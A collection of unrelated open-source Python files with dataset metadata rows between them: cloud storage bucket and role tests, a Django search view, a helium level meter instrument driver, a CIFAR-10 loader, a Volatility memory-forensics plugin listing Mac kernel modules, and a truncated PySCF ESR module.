async def test_bucket_create(self, provider_option: ProviderTestOption) -> None:
name = _make_bucket_name()
bucket = await provider_option.provider.create_bucket(name)
assert bucket.name == name
assert await provider_option.bucket_exists(name)
async def test_bucket_duplicate_create(
self,
provider_option: ProviderTestOption,
) -> None:
name = _make_bucket_name()
await provider_option.provider.create_bucket(name)
with pytest.raises(BucketExistsError):
await provider_option.provider.create_bucket(name)
async def test_bucket_delete(self, provider_option: ProviderTestOption) -> None:
name = _make_bucket_name()
bucket = await provider_option.provider.create_bucket(name)
await provider_option.provider.delete_bucket(bucket.name)
assert not await provider_option.bucket_exists(name)
async def test_bucket_delete_unknown(
self, provider_option: ProviderTestOption
) -> None:
with pytest.raises(BucketNotExistsError):
await provider_option.provider.delete_bucket(_make_bucket_name())
async def test_bucket_credentials_write_access(
self, provider_option: ProviderTestOption
) -> None:
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
credentials = await provider_option.provider.get_bucket_credentials(
bucket, write=True, requester="testing"
)
async with provider_option.make_client(bucket, credentials) as user_client:
await _test_write_access(user_client)
async def test_bucket_credentials_read_access(
self, provider_option: ProviderTestOption
) -> None:
return
if provider_option.type == "aws":
pytest.skip("Moto do not support embedding policies into token")
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
credentials = await provider_option.provider.get_bucket_credentials(
bucket, write=False, requester="testing"
)
async with provider_option.make_client(
bucket, credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_read_access(admin, user_client)
async def test_signed_url_for_blob(
self, provider_option: ProviderTestOption
) -> None:
if provider_option.type == "aws":
pytest.skip("Moto fails for signed url with 500")
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
async with provider_option.get_admin(bucket) as admin_client:
await admin_client.put_object("foo/bar", b"test data")
url = await provider_option.provider.sign_url_for_blob(bucket, "foo/bar")
async with ClientSession() as session:
async with session.get(url) as resp:
data = await resp.read()
assert data == b"test data"
async def test_public_access_to_bucket(
self, provider_option: ProviderTestOption
) -> None:
if provider_option.type == "aws":
pytest.skip("Moto has bad support of this operation")
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
async with provider_option.get_admin(bucket) as admin_client:
await admin_client.put_object("blob1", b"blob data 1")
await admin_client.put_object("blob2", b"blob data 2")
await provider_option.provider.set_public_access(bucket.name, True)
async with ClientSession() as session:
url = provider_option.get_public_url(bucket.name, "blob1")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 1"
url = provider_option.get_public_url(bucket.name, "blob2")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 2"
async def test_bucket_make_public_for_imported_bucket(
self, provider_option: ProviderTestOption
) -> None:
if provider_option.type == "aws":
pytest.skip("Moto fails with 500")
name = _make_bucket_name()
bucket = await provider_option.provider.create_bucket(name)
async with provider_option.get_admin(bucket) as admin_client:
await admin_client.put_object("blob1", b"blob data 1")
await admin_client.put_object("blob2", b"blob data 2")
async with UserBucketOperations.get_for_imported_bucket(
ImportedBucket(
id="not-important",
created_at=datetime.now(timezone.utc),
owner="user",
name="not-important",
org_name=None,
public=False,
provider_bucket=bucket,
credentials=provider_option.credentials_for_imported,
)
) as operations:
await operations.set_public_access(bucket.name, True)
async with ClientSession() as session:
url = provider_option.get_public_url(bucket.name, "blob1")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 1"
url = provider_option.get_public_url(bucket.name, "blob2")
async with session.get(url) as resp:
data = await resp.read()
assert data == b"blob data 2"
@pytest.fixture()
async def sample_role_permissions(
self, provider_option: ProviderTestOption
) -> list[BucketPermission]:
bucket_name = _make_bucket_name()
await provider_option.provider.create_bucket(bucket_name)
return [
BucketPermission(
bucket_name=bucket_name,
write=True,
)
]
async def test_role_create(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name = _make_role_name()
role = await provider_option.provider.create_role(name, sample_role_permissions)
assert name in role.name
assert await provider_option.role_exists(role.name)
async def test_role_create_multiple(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name1, name2 = _make_role_name(), _make_role_name()
role1 = await provider_option.provider.create_role(
name1, sample_role_permissions
)
role2 = await provider_option.provider.create_role(
name2, sample_role_permissions
)
assert await provider_option.role_exists(role1.name)
assert await provider_option.role_exists(role2.name)
async def test_role_duplicate(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name = _make_role_name()
await provider_option.provider.create_role(name, sample_role_permissions)
with pytest.raises(RoleExistsError):
await provider_option.provider.create_role(name, sample_role_permissions)
async def test_role_delete(
self,
provider_option: ProviderTestOption,
sample_role_permissions: list[BucketPermission],
) -> None:
name = _make_role_name()
role = await provider_option.provider.create_role(name, sample_role_permissions)
await provider_option.provider.delete_role(role)
assert not await provider_option.role_exists(role.name)
async def test_role_grant_bucket_write_access(
self,
provider_option: ProviderTestOption,
) -> None:
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket.name,
write=True,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(bucket, role.credentials) as user_client:
await _test_write_access(user_client)
async def test_role_grant_bucket_read_only_access(
self,
provider_option: ProviderTestOption,
) -> None:
return
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket.name,
write=False,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(
bucket, role.credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_read_access(admin, user_client)
async def test_role_grant_access_multiple_buckets(
self,
provider_option: ProviderTestOption,
) -> None:
if provider_option.type == "azure":
pytest.skip("Azure provider do not support multiple buckets roles")
bucket1 = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket1.name,
write=True,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(
bucket1, role.credentials
) as user_client:
await _test_write_access(user_client)
bucket2 = await provider_option.provider.create_bucket(_make_bucket_name())
await provider_option.provider.set_role_permissions(
role,
[
BucketPermission(
bucket_name=bucket1.name,
write=True,
),
BucketPermission(
bucket_name=bucket2.name,
write=True,
),
],
)
async with provider_option.make_client(
bucket1, role.credentials
) as user_client:
await _test_write_access(user_client)
async with provider_option.make_client(
bucket2, role.credentials
) as user_client:
await _test_write_access(user_client)
async def test_role_downgrade_access(
self,
provider_option: ProviderTestOption,
) -> None:
bucket = await provider_option.provider.create_bucket(_make_bucket_name())
permissions = [
BucketPermission(
bucket_name=bucket.name,
write=True,
)
]
role = await provider_option.provider.create_role(
_make_role_name(), permissions
)
async with provider_option.make_client(bucket, role.credentials) as user_client:
await _test_write_access(user_client)
await provider_option.provider.set_role_permissions(
role,
[
BucketPermission(
bucket_name=bucket.name,
write=False,
),
],
)
async with provider_option.make_client(
bucket, role.credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_read_access(admin, user_client)
await provider_option.provider.set_role_permissions(
role,
[],
)
async with provider_option.make_client(
bucket, role.credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_no_access(admin, user_client)
| 35.022624
| 88
| 0.655749
| 1,686
| 15,480
| 5.734282
| 0.094306
| 0.124535
| 0.080575
| 0.097745
| 0.738519
| 0.695801
| 0.6536
| 0.618225
| 0.609433
| 0.597745
| 0
| 0.005208
| 0.268152
| 15,480
| 441
| 89
| 35.102041
| 0.848177
| 0.000969
| 0
| 0.577128
| 0
| 0
| 0.030201
| 0
| 0
| 0
| 0
| 0
| 0.047872
| 1
| 0.007979
| false
| 0.010638
| 0.047872
| 0.005319
| 0.103723
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5bf9f4fe33b1e74de5e5a8a91381afcd0d937c
| 576
|
py
|
Python
|
appserver/search/views.py
|
sinag/SWE574-Horuscope
|
9725dd356cbfd19f0ce88d4a208c872be765bd88
|
[
"MIT"
] | null | null | null |
appserver/search/views.py
|
sinag/SWE574-Horuscope
|
9725dd356cbfd19f0ce88d4a208c872be765bd88
|
[
"MIT"
] | null | null | null |
appserver/search/views.py
|
sinag/SWE574-Horuscope
|
9725dd356cbfd19f0ce88d4a208c872be765bd88
|
[
"MIT"
] | 1
|
2020-08-07T12:54:51.000Z
|
2020-08-07T12:54:51.000Z
|
from django.http import HttpResponse
from django.shortcuts import render, redirect
from community.models import Community
# Create your views here.
def search_basic(request):
communities = None
if request.POST:
community_query = request.POST.get('community_search', False)
communities = Community.objects.filter(city__icontains=community_query)
print(communities)
return render(request, 'search/search_basic.html', {'communities': communities})
return render(request, 'search/search_basic.html', {'communities': communities})
| 30.315789
| 88
| 0.744792
| 65
| 576
| 6.476923
| 0.492308
| 0.078385
| 0.109264
| 0.142518
| 0.320665
| 0.320665
| 0.320665
| 0.320665
| 0.320665
| 0.320665
| 0
| 0
| 0.161458
| 576
| 18
| 89
| 32
| 0.871636
| 0.039931
| 0
| 0.181818
| 0
| 0
| 0.156934
| 0.087591
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.272727
| 0
| 0.545455
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5c97158341c4d0d209389c3a2affb30b2d34bf
| 9,772
|
py
|
Python
|
qcodes_contrib_drivers/drivers/Oxford/ILM200.py
|
jenshnielsen/Qcodes_contrib_drivers
|
dc878cdd99a62f4643a62163a3a6341f98cee440
|
[
"MIT"
] | null | null | null |
qcodes_contrib_drivers/drivers/Oxford/ILM200.py
|
jenshnielsen/Qcodes_contrib_drivers
|
dc878cdd99a62f4643a62163a3a6341f98cee440
|
[
"MIT"
] | 2
|
2020-05-29T11:00:52.000Z
|
2020-10-09T06:18:11.000Z
|
qcodes_contrib_drivers/drivers/Oxford/ILM200.py
|
jenshnielsen/Qcodes_contrib_drivers
|
dc878cdd99a62f4643a62163a3a6341f98cee440
|
[
"MIT"
] | 1
|
2020-04-24T01:15:44.000Z
|
2020-04-24T01:15:44.000Z
|
# OxfordInstruments_ILM200.py class, to perform the communication between the Wrapper and the device
# Copyright (c) 2017 QuTech (Delft)
# Code is available under the available under the `MIT open-source license <https://opensource.org/licenses/MIT>`__
#
# Pieter Eendebak <pieter.eendebak@tno.nl>, 2017
# Takafumi Fujita <t.fujita@tudelft.nl>, 2016
# Guenevere Prawiroatmodjo <guen@vvtp.tudelft.nl>, 2009
# Pieter de Groot <pieterdegroot@gmail.com>, 2009
from time import sleep
import visa
import logging
from qcodes import VisaInstrument
class OxfordInstruments_ILM200(VisaInstrument):
"""
This is the qcodes driver for the Oxford Instruments ILM 200 Helium Level Meter.
Usage:
Initialize with
<name> = instruments.create('name', 'OxfordInstruments_ILM200', address='<Instrument address>')
<Instrument address> = ASRL4::INSTR
Note: Since the ISOBUS allows for several instruments to be managed in parallel, the command
which is sent to the device starts with '@n', where n is the ISOBUS instrument number.
"""
def __init__(self, name, address, number=1, **kwargs):
"""
Initializes the Oxford Instruments ILM 200 Helium Level Meter.
Args:
name (str): name of the instrument
address (str): instrument address
number (int): ISOBUS instrument number (number=1 is specific to the ILM in F008)
Returns:
None
"""
logging.debug(__name__ + ' : Initializing instrument')
super().__init__(name, address, **kwargs)
self.visa_handle.set_visa_attribute(visa.constants.VI_ATTR_ASRL_STOP_BITS,
visa.constants.VI_ASRL_STOP_TWO)
self._address = address
self._number = number
self._values = {}
self.add_parameter('level',
label='level',
get_cmd=self._do_get_level,
unit='%')
self.add_parameter('status',
get_cmd=self._do_get_status)
self.add_parameter('rate',
get_cmd=self._do_get_rate,
set_cmd=self._do_set_rate)
# a dummy command to avoid the initial error
try:
self.get_idn()
sleep(70e-3) # wait for the device to be able to respond
self._read() # to flush the buffer
except Exception as ex:
logging.debug(ex)
def _execute(self, message):
"""
Write a command to the device and read answer. This function writes to
the buffer by adding the device number at the front, instead of 'ask'.
Args:
message (str) : write command for the device
Returns:
None
"""
logging.info(
__name__ + ' : Send the following command to the device: %s' % message)
self.visa_handle.write('@%s%s' % (self._number, message))
sleep(70e-3) # wait for the device to be able to respond
result = self._read()
if result.find('?') >= 0:
print("Error: Command %s not recognized" % message)
else:
return result
def _read(self):
"""
Reads the total bytes in the buffer and outputs as a string.
Args:
None
Returns:
message (str)
"""
# because protocol has no termination chars the read reads the number
# of bytes in the buffer
bytes_in_buffer = self.visa_handle.bytes_in_buffer
# a workaround for a timeout error in the pyvsia read_raw() function
with(self.visa_handle.ignore_warning(visa.constants.VI_SUCCESS_MAX_CNT)):
mes = self.visa_handle.visalib.read(
self.visa_handle.session, bytes_in_buffer)
# cannot be done on same line for some reason
mes = str(mes[0].decode())
return mes
def get_idn(self):
"""
Overrides the function of Instrument since ILM does not support `*IDN?`
This string is supposed to be a
comma-separated list of vendor, model, serial, and firmware, but
semicolon and colon are also common separators so we accept them here
as well.
Returns:
A dict containing vendor, model, serial, and firmware.
"""
try:
idstr = '' # in case self.ask fails
idstr = self._get_version().split()
# form is supposed to be comma-separated, but we've seen
# other separators occasionally
idparts = [idstr[3] + ' ' + idstr[4], idstr[0], idstr[5],
idstr[1] + ' ' + idstr[2]]
# in case parts at the end are missing, fill in None
if len(idparts) < 4:
idparts += [None] * (4 - len(idparts))
except Exception as ex:
logging.warn('Error getting or interpreting *IDN?: ' + repr(idstr))
logging.debug(ex)
idparts = [None, None, None, None]
return dict(zip(('vendor', 'model', 'serial', 'firmware'), idparts))
def get_all(self):
"""
Reads all implemented parameters from the instrument,
and updates the wrapper.
"""
logging.info(__name__ + ' : reading all settings from instrument')
self.level.get()
self.status.get()
self.rate.get()
def close(self):
"""
Safely close connection
"""
logging.info(__name__ + ' : Closing ILM200 connection')
self.local()
super().close()
# Functions: Monitor commands
def _get_version(self):
"""
Identify the device
Args:
None
Returns:
identification (str): should be 'ILM200 Version 1.08 (c) OXFORD 1994\r'
"""
logging.info(__name__ + ' : Identify the device')
return self._execute('V')
def _do_get_level(self):
"""
Get Helium level of channel 1.
Args:
None
Returns:
result (float) : Helium level
"""
logging.info(__name__ + ' : Read level of channel 1')
result = self._execute('R1')
return float(result.replace("R", "")) / 10
def _do_get_status(self):
"""
Get status of the device.
"""
logging.info(__name__ + ' : Get status of the device.')
result = self._execute('X')
usage = {
0: "Channel not in use",
1: "Channel used for Nitrogen level",
2: "Channel used for Helium Level (Normal pulsed operation)",
3: "Channel used for Helium Level (Continuous measurement)",
9: "Error on channel (Usually means probe unplugged)"
}
# current_flowing = {
# 0 : "Curent not flowing in Helium Probe Wire",
# 1 : "Curent not flowing in Helium Probe Wire"
# }
# auto_fill_status = {
# 00 : "End Fill (Level > FULL)",
# 01 : "Not Filling (Level < FULL, Level > FILL)",
# 10 : "Filling (Level < FULL, Level > FILL)",
# 11 : "Start Filling (Level < FILL)"
# }
return usage.get(int(result[1]), "Unknown")
def _do_get_rate(self):
"""
Get helium meter channel 1 probe rate
Input:
None
Output:
rate(int) :
0 : "SLOW"
1 : "FAST"
"""
rate = {
1: "1 : Helium Probe in FAST rate",
0: "0 : Helium Probe in SLOW rate"
}
result = self._execute('X')
return rate.get(int(format(int(result[5:7]), '08b')[6]), "Unknown")
def remote(self):
"""
Set control to remote & locked
"""
logging.info(__name__ + ' : Set control to remote & locked')
self.set_remote_status(1)
def local(self):
"""
Set control to local & locked
"""
logging.info(__name__ + ' : Set control to local & locked')
self.set_remote_status(0)
def set_remote_status(self, mode):
"""
Set remote control status.
Args:
mode(int) :
0 : "Local and locked",
1 : "Remote and locked",
2 : "Local and unlocked",
3 : "Remote and unlocked",
Returns:
None
"""
status = {
0: "Local and locked",
1: "Remote and locked",
2: "Local and unlocked",
3: "Remote and unlocked",
}
logging.info(__name__ + ' : Setting remote control status to %s' %
status.get(mode, "Unknown"))
self._execute('C%s' % mode)
# Functions: Control commands (only recognised when in REMOTE control)
def set_to_slow(self):
"""
Set helium meter channel 1 to slow mode.
"""
self.set_remote_status(1)
logging.info(__name__ + ' : Setting Helium Probe in SLOW rate')
self._execute('S1')
self.set_remote_status(3)
def set_to_fast(self):
"""
Set helium meter channel 1 to fast mode.
"""
self.set_remote_status(1)
logging.info(__name__ + ' : Setting Helium Probe in FAST rate')
self._execute('T1')
self.set_remote_status(3)
def _do_set_rate(self, rate):
"""
Set helium meter channel 1 probe rate
Args:
rate(int) :
0 : "SLOW"
1 : "FAST"
"""
self.set_remote_status(1)
if rate == 0:
self.set_to_slow()
elif rate == 1:
self.set_to_fast()
self.set_remote_status(3)
logging.info(self._do_get_rate())
| 32.144737
| 115
| 0.556283
| 1,147
| 9,772
| 4.589364
| 0.28422
| 0.018617
| 0.031345
| 0.028875
| 0.237652
| 0.140957
| 0.115122
| 0.079407
| 0.06345
| 0.06345
| 0
| 0.019994
| 0.344863
| 9,772
| 303
| 116
| 32.250825
| 0.802249
| 0.360827
| 0
| 0.134921
| 0
| 0
| 0.163254
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126984
| false
| 0
| 0.031746
| 0
| 0.222222
| 0.007937
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5cdd0275ff0c38add8e228ff02333ee397a98c
| 4,417
|
py
|
Python
|
load_cifar_10.py
|
xgxofdream/CNN-Using-Local-CIFAR-10-dataset
|
8076056da58a5b564ded50f4cdb059585deb900d
|
[
"Apache-2.0"
] | null | null | null |
load_cifar_10.py
|
xgxofdream/CNN-Using-Local-CIFAR-10-dataset
|
8076056da58a5b564ded50f4cdb059585deb900d
|
[
"Apache-2.0"
] | null | null | null |
load_cifar_10.py
|
xgxofdream/CNN-Using-Local-CIFAR-10-dataset
|
8076056da58a5b564ded50f4cdb059585deb900d
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import pickle
"""
The CIFAR-10 dataset consists of 60000 32x32 colour images in 10 classes, with 6000 images per class. There are 50000
training images and 10000 test images.
The dataset is divided into five training batches and one test batch, each with 10000 images. The test batch contains
exactly 1000 randomly-selected images from each class. The training batches contain the remaining images in random
order, but some training batches may contain more images from one class than another. Between them, the training
batches contain exactly 5000 images from each class.
"""
def unpickle(file):
"""load the cifar-10 data"""
with open(file, 'rb') as fo:
data = pickle.load(fo, encoding='bytes')
return data
def load_cifar_10_data(data_dir, negatives=False):
"""
Return train_data, train_filenames, train_labels, test_data, test_filenames, test_labels
"""
# get the meta_data_dict
# num_cases_per_batch: 1000
# label_names: ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
# num_vis: :3072
meta_data_dict = unpickle(data_dir + "/batches.meta")
cifar_label_names = meta_data_dict[b'label_names']
cifar_label_names = np.array(cifar_label_names)
# training data
cifar_train_data = None
cifar_train_filenames = []
cifar_train_labels = []
# cifar_train_data_dict
# 'batch_label': 'training batch 5 of 5'
# 'data': ndarray
# 'filenames': list
# 'labels': list
for i in range(1, 6):
cifar_train_data_dict = unpickle(data_dir + "/data_batch_{}".format(i))
if i == 1:
cifar_train_data = cifar_train_data_dict[b'data']
else:
cifar_train_data = np.vstack((cifar_train_data, cifar_train_data_dict[b'data']))
cifar_train_filenames += cifar_train_data_dict[b'filenames']
cifar_train_labels += cifar_train_data_dict[b'labels']
cifar_train_data = cifar_train_data.reshape((len(cifar_train_data), 3, 32, 32))
if negatives:
cifar_train_data = cifar_train_data.transpose(0, 2, 3, 1).astype(np.float32)
else:
cifar_train_data = np.rollaxis(cifar_train_data, 1, 4)
cifar_train_filenames = np.array(cifar_train_filenames)
cifar_train_labels = np.array(cifar_train_labels)
# test data
# cifar_test_data_dict
# 'batch_label': 'testing batch 1 of 1'
# 'data': ndarray
# 'filenames': list
# 'labels': list
cifar_test_data_dict = unpickle(data_dir + "/test_batch")
cifar_test_data = cifar_test_data_dict[b'data']
cifar_test_filenames = cifar_test_data_dict[b'filenames']
cifar_test_labels = cifar_test_data_dict[b'labels']
cifar_test_data = cifar_test_data.reshape((len(cifar_test_data), 3, 32, 32))
if negatives:
cifar_test_data = cifar_test_data.transpose(0, 2, 3, 1).astype(np.float32)
else:
cifar_test_data = np.rollaxis(cifar_test_data, 1, 4)
cifar_test_filenames = np.array(cifar_test_filenames)
cifar_test_labels = np.array(cifar_test_labels)
return cifar_train_data, cifar_train_filenames, cifar_train_labels, \
cifar_test_data, cifar_test_filenames, cifar_test_labels, cifar_label_names
if __name__ == "__main__":
"""show it works"""
cifar_10_dir = '.\cifar10-dataset'
train_data, train_filenames, train_labels, test_data, test_filenames, test_labels, label_names = \
load_cifar_10_data(cifar_10_dir)
print("Train data: ", train_data.shape)
print("Train filenames: ", train_filenames.shape)
print("Train labels: ", train_labels.shape)
print("Test data: ", test_data.shape)
print("Test filenames: ", test_filenames.shape)
print("Test labels: ", test_labels.shape)
print("Label names: ", label_names.shape)
# Don't forget that the label_names and filesnames are in binary and need conversion if used.
# display some random training images in a 25x25 grid
num_plot = 5
f, ax = plt.subplots(num_plot, num_plot)
for m in range(num_plot):
for n in range(num_plot):
idx = np.random.randint(0, train_data.shape[0])
ax[m, n].imshow(train_data[idx])
ax[m, n].get_xaxis().set_visible(False)
ax[m, n].get_yaxis().set_visible(False)
f.subplots_adjust(hspace=0.1)
f.subplots_adjust(wspace=0)
plt.show()
| 36.808333
| 118
| 0.699796
| 645
| 4,417
| 4.494574
| 0.244961
| 0.096585
| 0.086927
| 0.037254
| 0.361159
| 0.298034
| 0.162815
| 0.12832
| 0.098655
| 0.073129
| 0
| 0.029047
| 0.197193
| 4,417
| 119
| 119
| 37.117647
| 0.788494
| 0.150781
| 0
| 0.078125
| 0
| 0
| 0.070058
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03125
| false
| 0
| 0.046875
| 0
| 0.109375
| 0.109375
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5d25adf1fa45402acfda5811c79b3110e5df76
| 3,054
|
py
|
Python
|
volatility3/framework/plugins/mac/lsmod.py
|
leohearts/volatility3
|
f52bd8d74fc47e63ea2611d0171b63dc589d4fdf
|
[
"Linux-OpenIB"
] | null | null | null |
volatility3/framework/plugins/mac/lsmod.py
|
leohearts/volatility3
|
f52bd8d74fc47e63ea2611d0171b63dc589d4fdf
|
[
"Linux-OpenIB"
] | null | null | null |
volatility3/framework/plugins/mac/lsmod.py
|
leohearts/volatility3
|
f52bd8d74fc47e63ea2611d0171b63dc589d4fdf
|
[
"Linux-OpenIB"
] | null | null | null |
# This file is Copyright 2019 Volatility Foundation and licensed under the Volatility Software License 1.0
# which is available at https://www.volatilityfoundation.org/license/vsl-v1.0
#
"""A module containing a collection of plugins that produce data typically
found in Mac's lsmod command."""
from volatility3.framework import renderers, interfaces, contexts
from volatility3.framework.configuration import requirements
from volatility3.framework.interfaces import plugins
from volatility3.framework.objects import utility
from volatility3.framework.renderers import format_hints
class Lsmod(plugins.PluginInterface):
"""Lists loaded kernel modules."""
_required_framework_version = (1, 0, 0)
_version = (1, 0, 0)
@classmethod
def get_requirements(cls):
return [
requirements.TranslationLayerRequirement(name = 'primary',
description = 'Memory layer for the kernel',
architectures = ["Intel32", "Intel64"]),
requirements.SymbolTableRequirement(name = "darwin", description = "Mac kernel")
]
@classmethod
def list_modules(cls, context: interfaces.context.ContextInterface, layer_name: str, darwin_symbols: str):
"""Lists all the modules in the primary layer.
Args:
context: The context to retrieve required elements (layers, symbol tables) from
layer_name: The name of the layer on which to operate
darwin_symbols: The name of the table containing the kernel symbols
Returns:
A list of modules from the `layer_name` layer
"""
kernel = contexts.Module(context, darwin_symbols, layer_name, 0)
kernel_layer = context.layers[layer_name]
kmod_ptr = kernel.object_from_symbol(symbol_name = "kmod")
try:
kmod = kmod_ptr.dereference().cast("kmod_info")
except exceptions.InvalidAddressException:
return []
yield kmod
try:
kmod = kmod.next
except exceptions.InvalidAddressException:
return []
seen = set()
while kmod != 0 and \
kmod not in seen and \
len(seen) < 1024:
kmod_obj = kmod.dereference()
if not kernel_layer.is_valid(kmod_obj.vol.offset, kmod_obj.vol.size):
break
seen.add(kmod)
yield kmod
try:
kmod = kmod.next
except exceptions.InvalidAddressException:
return
def _generator(self):
for module in self.list_modules(self.context, self.config['primary'], self.config['darwin']):
mod_name = utility.array_to_string(module.name)
mod_size = module.size
yield 0, (format_hints.Hex(module.vol.offset), mod_name, mod_size)
def run(self):
return renderers.TreeGrid([("Offset", format_hints.Hex), ("Name", str), ("Size", int)], self._generator())
| 34.704545
| 114
| 0.630321
| 337
| 3,054
| 5.599407
| 0.388724
| 0.039746
| 0.063593
| 0.023847
| 0.073132
| 0.073132
| 0.073132
| 0.073132
| 0.073132
| 0.073132
| 0
| 0.013755
| 0.285855
| 3,054
| 87
| 115
| 35.103448
| 0.851444
| 0.208579
| 0
| 0.28
| 0
| 0
| 0.044406
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.1
| 0.04
| 0.34
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe5f1c04bf52b3ba6d57139fe21bba52f39a4f4c
| 6,901
|
py
|
Python
|
pyscf/prop/esr/uks.py
|
azag0/pyscf
|
1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b
|
[
"Apache-2.0"
] | 2
|
2021-08-03T12:32:25.000Z
|
2021-09-29T08:19:02.000Z
|
pyscf/prop/esr/uks.py
|
azag0/pyscf
|
1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b
|
[
"Apache-2.0"
] | null | null | null |
pyscf/prop/esr/uks.py
|
azag0/pyscf
|
1e3e27b61b3cfd22c9679d2c9851c13b3ebc5a1b
|
[
"Apache-2.0"
] | 2
|
2020-06-01T05:31:38.000Z
|
2022-02-08T02:38:33.000Z
|
#!/usr/bin/env python
# Copyright 2014-2019 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
'''
Non-relativistic unrestricted Kohn-Sham electron spin-rotation coupling
(In testing)
Refs:
J. Phys. Chem. A. 114, 9246, 2010
Mole. Phys. 9, 6, 585, 1964
'''
from functools import reduce
import numpy, sys
from pyscf import lib
from pyscf.lib import logger
from pyscf.dft import numint
from pyscf.prop.nmr import uks as uks_nmr
from pyscf.prop.esr import uhf as uhf_esr
from pyscf.prop.esr.uhf import _write, align
from pyscf.data import nist
from pyscf.grad import rks as rks_grad
# Note mo10 is the imaginary part of MO^1
def para(obj, mo10, mo_coeff, mo_occ, qed_fac=1):
mol = obj.mol
effspin = mol.spin * .5
muB = .5 # Bohr magneton
#qed_fac = (nist.G_ELECTRON - 1)
orboa = mo_coeff[0][:,mo_occ[0]>0]
orbob = mo_coeff[1][:,mo_occ[1]>0]
dm0a = numpy.dot(orboa, orboa.T)
dm0b = numpy.dot(orbob, orbob.T)
dm10a = [reduce(numpy.dot, (mo_coeff[0], x, orboa.T)) for x in mo10[0]]
dm10b = [reduce(numpy.dot, (mo_coeff[1], x, orbob.T)) for x in mo10[1]]
dm10a = numpy.asarray([x-x.T for x in dm10a])
dm10b = numpy.asarray([x-x.T for x in dm10b])
hso1e = uhf_esr.make_h01_soc1e(obj, mo_coeff, mo_occ, qed_fac)
para1e =-numpy.einsum('xji,yij->xy', dm10a, hso1e)
para1e+= numpy.einsum('xji,yij->xy', dm10b, hso1e)
para1e *= 1./effspin / muB
#_write(obj, align(para1e)[0], 'SOC(1e)/OZ')
if obj.para_soc2e:
raise NotImplementedError('dia_soc2e = %s' % obj.dia_soc2e)
para = para1e
return para
# Treat Vxc as one-particle operator Vnuc
def get_vxc_soc(ni, mol, grids, xc_code, dms, max_memory=2000, verbose=None):
xctype = ni._xc_type(xc_code)
make_rho, nset, nao = ni._gen_rho_evaluator(mol, dms, hermi=1)
ngrids = len(grids.weights)
BLKSIZE = numint.BLKSIZE
blksize = min(int(max_memory/12*1e6/8/nao/BLKSIZE)*BLKSIZE, ngrids)
shls_slice = (0, mol.nbas)
ao_loc = mol.ao_loc_nr()
vmat = numpy.zeros((2,3,nao,nao))
if xctype == 'LDA':
